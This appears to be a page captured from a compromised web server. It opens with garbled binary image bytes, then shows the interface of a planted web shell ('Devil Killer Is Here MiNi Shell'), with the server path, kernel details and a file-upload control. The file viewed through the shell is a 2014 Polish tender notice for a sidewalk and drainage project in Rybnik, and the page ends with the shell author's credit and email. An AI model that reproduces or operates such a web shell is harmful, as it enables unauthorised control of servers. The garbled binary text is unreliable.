JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140408/119072-N-2014.html

<p class="kh_header"><b>Rybnik: Budowa chodnika wraz z odwodnieniem przy drodze powiatowej nr 5025S na odcinku od skrzyżowania 
z ulicą Buczyna w Czernicy do skrzyżowania z ulicą Jana  w Łukowie.</b><br>
<b>Numer ogłoszenia: 119072 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Jankowicka 49, 44-200 Rybnik, woj. śląskie, tel. 032 4227478, 4227874, faks 032 4227479.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdp.powiatrybnicki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa chodnika wraz z odwodnieniem przy drodze powiatowej nr 5025S na odcinku od skrzyżowania 
z ulicą Buczyna w Czernicy do skrzyżowania z ulicą Jana  w Łukowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zadanie p.n. : Budowa chodnika wraz z odwodnieniem przy drodze powiatowej nr 5025S na odcinku od skrzyżowania z ulicą Buczyna w Czernicy do skrzyżowania z ulicą Jana  w Łukowie , długości 0,848 km.                 W zakresie zadania ujęto również prace związane z przesunięciem słupa energetycznego nr 235076 w Łukowie, kolidującego z realizacją inwestycji.

BUDOWA CHODNIKA Z ODWODNIENIEM
Zakres rzeczowy obejmuje budowę kanalizacji deszczowej fi 315 mm na odcinku od km 0+125 - 0+825,  poszerzenie podbudowy i nawierzchni jezdni do 3,25 m dla pasa przykrawężnikowego i budowę lewostronnego chodnika  na odcinku                 od km 0+000 - 0+848 ,  m.in.:
1).   Poszerzenie pasa przykrawężnikowego  jezdni do szerokości 3,25 m wraz  z nową konstrukcją po przekopach pod 
      kanalizację (wokół studzienek ściekowych i przykanalików) na odcinku od  km 0+000÷0+848; szerokość zakładek 
      pomiędzy warstwami szerokości 15 cm , w tym :
a) warstwa ścieralna z betonu asfaltowego AC8S grubości 5 cm,
b)warstwa wiążąca z betonu asfaltowego AC16W grubości 8 cm,
c)wzmocnienie nawierzchni geosiatką,
d)podbudowa zasadnicza z chudego betonu cementowego C12/15 grubości 23 cm;
e)wzmocnienie podłoża  gruntem stabilizowanym spoiwem hydraulicznym (cementem) warstwą grubości 15 cm;

2).    Budowę chodnika lewostronnego zlokalizowanego przy krawędzi jezdni szerokości deptaka 1,40 m na odcinku                od km 0+000÷0+848 , w tym:
a)warstwa ścieralna z kostki betonowej brukowej grubości 6 cm, koloru szarego w ilości 80% i grafitowej 20%
b)podsypka piaskowa grubości 3 cm,
c)podbudowa z kruszywa łamanego  (0,0÷31,5 mm) stabilizowanego mechanicznie grubości 20 cm,
d)wzmocnienie podłoża poprzez wymianę gruntu jako obsypka (piasek) kanału  fi 315 mm;
e)obramowanie chodnika od strony jezdni krawężnikiem betonowym prostokątnym ściętym 15/30 cm ułożonym  
   bezpośrednio na świeżej ławie betonowej z oporem C 12/15 o wydatku Vbet 0,069 m3/m; wysokość krawężnika 
   nad krawędź jezdni wynosi 12 cm;
f)obramowanie chodnika od strony skarpy obrzeżem betonowym 8/30 cm ułożonym bezpośrednio na świeżej ławie 
   betonowej z oporem C 12/15 o wydatku Vbet 0,061 m3/m

3).  Budowę przejazdów przez chodnik w ilości 24 szt., szerokości na krawędzi jezdni 8,0 m, (w tym skosy 2 x1,5 m) i 5,0 m
                w linii obrzeży; lokalizacja wg wykazu wjazdów do bram, w tym: 
a)warstwa ścieralna z kostki betonowej brukowej grubości 8 cm, koloru grafitowego;
b)podsypka piaskowa grubości 3 cm,
c)podbudowa z kruszywa łamanego (0,0÷31,5 mm) stabilizowanego mechanicznie grubości 20 cm;
d)wzmocnienie podłoża poprzez wymianę gruntu jako obsypka (piasek) kanału fi 315 mm;
e)obramowanie przejazdu od strony jezdni krawężnikiem  betonowym najazdowym ułożonym bezpośrednio  na świeżej ławie betonowej z oporem C 12/15 o wydatku Vbet 0,069 m3/m; wysokość krawężnika nad krawędź jezdni wynosi 4 cm;
f)obramowanie przejazdu od strony posesji  krawężnikiem  betonowym najazdowym ułożonym na płask bezpośrednio  na świeżej ławie betonowej C 12/15 o wydatku Vbet 0,060 m3/m; wysokość krawężnika nad krawędź jezdni wynosi 4 cm;

4).  Budowę kanalizacji deszczowej na odcinku od km 0+125÷0+825 długości 0,700 km , w tym:
              a) budowę kanału fi 315 mm z rur PVC ułożonych na podłożu z piasku grubości 15 cm i  obsypką piaskiem
              do wysokości spodu konstrukcji chodnika; obsypka stanowi równocześnie wymianę gruntu dla uzyskania  grupy 
              nośności G1;
       b) montaż studni rewizyjnych betonowych prefabrykowanych fi 1000 w ilości 21 szt i 1500 mm w ilości 1 szt 
       z włazem kanałowym żeliwnym  klasy B; obsypka studni piaskiem;
       c) montaż studzienek ściekowych betonowych prefabrykowanych fi 500 mm z osadnikiem,w ilości 16 szt z wpustem 
       żeliwnym uchylnym kl. D; obsypka studzienki piaskiem stabilizowanym cementem;
               d) montaż przykanalików z rur PVC fi 200 mm, w ilości 33 m na podłożu z piasku grubości 15cm; obsypka 
               przykanalików piaskiem stabilizowanym cementem;
               e) w km 0+125÷0+700 dren z rur PVC fi 100 mm w osłonie z  geowłókniny;
               f)  w km 0+038,50 przedłużenie przepustu drogowego fi 80 cm o 1,0 m, budowa typowej  ścianki czołowej
               i zabudowanie poręczy ochronnej długości 3x1,5 m;
               g)  w km 0+366 (na wylocie ulicy Buczyny) zabudować odwodnienie liniowe długości 5,0 m z  kratą żeliwną 
               szerokości 10 cm z podłączeniem odprowadzenia wody do studni rewizyjnej w km 0+360;
               h) przy studniach rewizyjnych w km 0+463 i 0+495 wykonać dodatkowe wloty zaopatrzone w  kraty celem 
               wprowadzenia ewentualnych wód powierzchniowych z lokalnych obniżeń terenu;
              i) w km 0+495 na wylocie przepustu drogowego fi 80 cm zabudować typową ściankę czołową;
              j) w km 0+495 na wylocie przepustu oczyścić z namułu i pogłębić rów odprowadzający na  długości 60 m; 
              k)  umocnienie skarp :  skarpy o nachyleniu 1 : 1,5 umocnić humusem z obsianiem; skarpy o nachyleniu 1 : 1 
              umocnić płytami ażurowymi 60x40x10 cm;

5). Przebudowę wjazdów do bram na szerokości chodnika w ilości 24 szt, a na dalszym odcinku odtworzenie 
    (przebrukowanie, wyrównanie itp.) istniejącej konstrukcji z równoczesną korektą niwelety;

a)  w km 0+366 (wlot ulicy Buczyna) poszerzyć istniejący wlot do 5,0 m na długości 10,0 m;

b)  istniejące oznakowanie pionowe zlokalizowane w projektowanym pasie nawierzchni chodnika należy przenieść poza 
     chodnik.



PRZESUNIĘCIE SŁUPA ENERGETYCZNEGO NR  235076 W ŁUKOWIE
Istniejący słup należy wymienić na nowy słup wirowany z przesunięciem na działkę nr 409/25. Na słupie należy przewiesić istniejące przewody nN oraz wykonać uziemienie ochronne.
Słup posadowić na  działce zgodnie z rys. nr 2 planem zagospodarowania.

Wykonawca  ma obowiązek  przygotować  w dokumentacji powykonawczej  dla robót energetycznych wszelkie materiały  wymagane zapisami uzgodnień zawartymi w dokumentacji projektowej , porozumieniu kolizyjnym  z załącznikami  oraz  potwierdzenia zlecenia nadzorów branżowych.

Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu oraz technologii wykonania i odbioru robót zawierają:  projekt   budowlano - wykonawczy , przedmiar robót  oraz szczegółowe specyfikacje techniczne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.23.13.00-8, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1  Wymaga się wniesienia wadium w wysokości : 4600,00 złotych.
2  Wadium może być wniesione w jednej z następujących form , określonych w art. 45 ust. 6 pkt 1-5
1) pieniądzu
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym , że zobowiązanie 
    kasy jest zawsze zobowiązaniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r.              
    o  utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

3 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego
 w  Banku Spółdzielczym w Żorach Nr  03 8456 0009 2001 0023 9732 0002, a dowód wniesienia dołączyć do oferty.

4 Za dzień wniesienia wadium w pieniądzu uważa się datę wpływu środków finansowych (wadium) na rachunek Zamawiającego, a nie datę obciążenia rachunku Wykonawcy (wpłaty). Wadium wnoszone w pieniądzu uważa się za wniesione w terminie , jeżeli zostanie uznany rachunek Zamawiającego  przed terminem składania ofert.

5 W przypadku wniesienia wadium w innej formie niż w pieniądzu kserokopię dokumentu wadialnego potwierdzoną za zgodność z oryginałem należy załączyć do oferty ,  w sposób umożliwiający jego złożenie i przechowanie bez naruszania ofert w Zarządzie Dróg Powiatowych w Rybniku.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert  w   postępowaniu, a jeżeli okres prowadzenia  działalności  jest krótszy - w tym okresie  wykonał  co najmniej: 
-  jedno  zamówienie  polegające na wykonaniu remontu , przebudowy bądź budowie chodnika o nawierzchni z kostki betonowej brukowej wraz z  remontem, przebudową bądź budową kanalizacji deszczowej o wartości co najmniej                                 500 000 złotych brutto ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  spełnienie warunku , jeżeli Wykonawca  wykaże , że ma do dyspozycji  :

a) osobę do pełnienia funkcji kierownika budowy  odpowiedzialną za kierowanie  robotami   budowlanymi , posiadającą   uprawnienia  do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń oraz wpis na listę członków właściwej Okręgowej Izby Samorządu Zawodowego , a także posiadającą co najmniej 2 letnie doświadczenie zawodowe.
b)  osobę do pełnienia funkcji  kierownika robót  posiadającą uprawnienia do kierowania robotami budowlanymi                          w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych bez ograniczeń oraz wpis na listę członków właściwej Okręgowej Izby Samorządu Zawodowego , a także posiadającą co najmniej 2 letnie doświadczenie zawodowe.

W przypadku osób posiadających uprawnienia wydane poza terytorium  Rzeczpospolitej  Polskiej wymaga się, aby spełniały one warunki  określone w art. 12a ustawy Prawo budowlane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty względnie do podpisania innych dokumentów  składanych wraz z ofertą, 
o ile prawo do po o      o ile prawo do podpisania oferty nie wynika z innych  dokumentów złożonych wraz z ofertą. Pełnomocnictwo 
                                     powinno być złożone w oryginale lub kopii poświadczonej za zgodność  z oryginałem przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Strony mają prawo do przedłużenia Terminu zakończenia robót o okres trwania przyczyn,  z  powodu których będzie 
        zagrożone dotrzymanie Terminu zakończenia robót, w następujących  sytuacjach:
a)	jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie Terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania Terenu budowy, konieczności zmian Dokumentacji projektowej w zakresie, w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie Terminu zakończenia robót,
b)	gdy wystąpią niekorzystne warunki atmosferyczne uniemożliwiające prawidłowe wykonanie robót, w szczególności z powodu technologii realizacji prac określonej: Umową, normami lub innymi przepisami, wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania prac w tym okresie nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,
c)	gdy wystąpi konieczność wykonania robót zamiennych lub innych robót niezbędnych do wykonania przedmiotu Umowy ze względu na zasady wiedzy technicznej, oraz udzielenia zamówień dodatkowych, które wstrzymują lub opóźniają realizację przedmiotu Umowy, wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
d)	wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,
e)	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,
f)	jeżeli wystąpi brak możliwości wykonywania robót z powodu  nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,
g)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

2.       Wykonawca  jest uprawniony do żądania zmiany Umowy w zakresie Materiałów, parametrów 
          technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu 
          Umowy w następujących sytuacjach: 
a)	konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,

b)	konieczności realizacji robót wynikających z wprowadzenia w Dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego, wynikających z art. 36a ust. 1 Prawa Budowlanego,
c)	wystąpienia warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, rozpoznania terenu w zakresie znalezisk archeologicznych, występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych założeń niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy,
d)	wystąpienia warunków Terenu budowy odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,
e)	konieczności zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
f)	wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji,
g)	wystąpienia Siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.

3. Zmiany dokonywane są poprzez złożenie wniosku o zmianę w formie pisemnej przez jedną ze stron wraz z określeniem zmiany, podaniem uzasadnienia, czasu wykonania zmiany.

4. Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności,.

5. W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:
a)	danych związanych z obsługą administracyjno-organizacyjną Umowy,
b)	danych teleadresowych, 
c)	danych rejestrowych,
d)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.

6. Strony umowy zawierają stosowny aneks w celu dokonania zmian w niniejszej umowie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdp.powiatrybnicki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2014 godzina 08:30, miejsce: Zarząd Dróg Powiatowych , 44-200 Rybnik ul. Jankowicka 49,  pokój 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com